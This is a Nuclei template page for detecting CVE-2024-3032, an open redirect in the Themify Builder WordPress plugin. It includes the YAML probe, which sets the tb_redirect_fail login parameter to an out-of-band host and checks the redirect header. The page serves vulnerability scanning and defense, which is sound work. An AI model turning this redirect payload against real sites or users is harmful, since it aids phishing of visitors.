Skip to content
Nuclei Templates

WordPress Themify Builder < 7.5.8 - Open Redirect

ID: CVE-2024-3032

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,wp-plugin,redirect,themify-builder

Description

Section titled “Description”

The Themify Builder WordPress plugin before version 7.5.8 contains an open redirect vulnerability. The plugin does not validate the tb_redirect_fail parameter before redirecting users to its value, which could allow attackers to redirect users to malicious websites.

YAML Source

Section titled “YAML Source”
id: CVE-2024-3032


info:
  name: WordPress Themify Builder < 7.5.8 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    The Themify Builder WordPress plugin before version 7.5.8 contains an open redirect vulnerability. The plugin does not validate the tb_redirect_fail parameter before redirecting users to its value, which could allow attackers to redirect users to malicious websites.
  reference:
    - https://wpscan.com/vulnerability/d130a60c-c36b-4994-9b0e-e52cd7f99387
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-3032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3032
    cwe-id: CWE-601
    cpe: cpe:2.3:a:themify:builder:*:*:*:*:-:wordpress:*:*
  metadata:
    max-request: 2
    vendor: themify
    product: builder
    fofa-query: body="wp-content/plugins/themify-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,redirect,themify-builder


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "themify-builder"
        internal: true


  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: http://oast.me


        log={{username}}&pwd={{password}}&tb_login=1&tb_redirect_fail=https://oast.me


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302


      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4b0a00483046022100dc2271ea7e5d9e40dbb1f27ea50fd2ff74a0f4a62498610ddf759e6a81fd7633022100857bf6a9389e60288ad0b7788e62d468455e303ad506c52f00c3a2f7903fad98:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-3032.yaml"

View on Github